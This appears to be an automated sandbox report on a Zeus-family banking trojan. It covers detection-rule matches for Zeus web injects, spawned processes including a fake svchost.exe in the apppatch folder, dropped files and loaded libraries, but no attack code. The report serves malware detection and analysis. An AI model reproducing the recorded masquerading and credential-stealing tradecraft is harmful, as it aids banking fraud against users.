Source: 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1962925986.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1995104325.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1963615191.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1899640794.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2011646276.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1992107371.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1980820181.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964296820.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2000260170.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1963816092.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1953762470.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Matched rule: Windows_Trojan_Zeus_e51c60d7, reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
The same rule, with identical metadata, matched in each of the following sources:
Source: 00000002.00000003.1984425254.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1930720915.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1962281793.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1960879139.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2017537084.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1984646788.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1992581990.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1873423952.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1841520196.000000000F340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1994473881.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1964748612.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.1981345088.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000002.00000003.2017774117.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Process Memory Space: WlCVLbzNph.exe PID: 6788, type: MEMORYSTR
Source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 5584, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 3804, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 1364, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2232, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 6644, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 4864, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 7160, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2688, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 1992, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2800, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 7128, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 6048, type: MEMORYSTR
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 5636, type: MEMORYSTR
Source: WlCVLbzNph.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@10/52@2221/23
Source: C:\Users\user\Desktop\WlCVLbzNph.exe, Code function: 0_2_00401C70 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401C70
Source: C:\Users\user\Desktop\WlCVLbzNph.exe, Code function: 0_2_00402560 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402560
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Program Files (x86)\Windows Defender\vonypom.com
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[1].htm
Source: C:\Windows\apppatch\svchost.exe, Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5584
Source: C:\Windows\apppatch\svchost.exe, Mutant created: \Sessions\1\BaseNamedObjects\92F35F00a
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2800
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3804
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7128
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2232
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6048
Source: C:\Users\user\Desktop\WlCVLbzNph.exe, File created: C:\Users\user\AppData\Local\Temp\5AFF.tmp
Source: WlCVLbzNph.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\WlCVLbzNph.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WlCVLbzNph.exe, ReversingLabs: Detection: 84%
Source: WlCVLbzNph.exe, String found in binary or memory: -help
Source: svchost.exe, String found in binary or memory: -help
Source: C:\Users\user\Desktop\WlCVLbzNph.exe, File read: C:\Users\user\Desktop\WlCVLbzNph.exe
Source: unknownProcess created: C:\Users\user\Desktop\WlCVLbzNph.exe "C:\Users\user\Desktop\WlCVLbzNph.exe"
Source: C:\Users\user\Desktop\WlCVLbzNph.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 716
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 732
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 720
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 748
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 728
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 712
Source: C:\Users\user\Desktop\WlCVLbzNph.exe
Section loaded: apphelp.dll, inetcomm.dll, msoert2.dll, oleacc.dll, inetres.dll, vmhgfs.dll, netapi32.dll, samcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpclient.dll, version.dll, msasn1.dll, profapi.dll, kernel.appcore.dll, uxtheme.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe
Section loaded: apphelp.dll, inetcomm.dll, msoert2.dll, oleacc.dll, inetres.dll, vmhgfs.dll, netapi32.dll, samcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, mpclient.dll, version.dll, msasn1.dll, profapi.dll, kernel.appcore.dll, uxtheme.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, winscard.dll, devobj.dll, sensapi.dll, iphlpapi.dll, dbghelp.dll, dnsapi.dll, wininet.dll, iertutil.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, urlmon.dll, srvcli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, winsta.dll, symsrv.dll, samlib.dll
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
Section loaded: winscard.dll, devobj.dll, sensapi.dll, iphlpapi.dll, dbghelp.dll, netapi32.dll, samcli.dll, netutils.dll, dnsapi.dll, wininet.dll, windows.storage.dll, wldp.dll, sspicli.dll, iertutil.dll, profapi.dll, kernel.appcore.dll
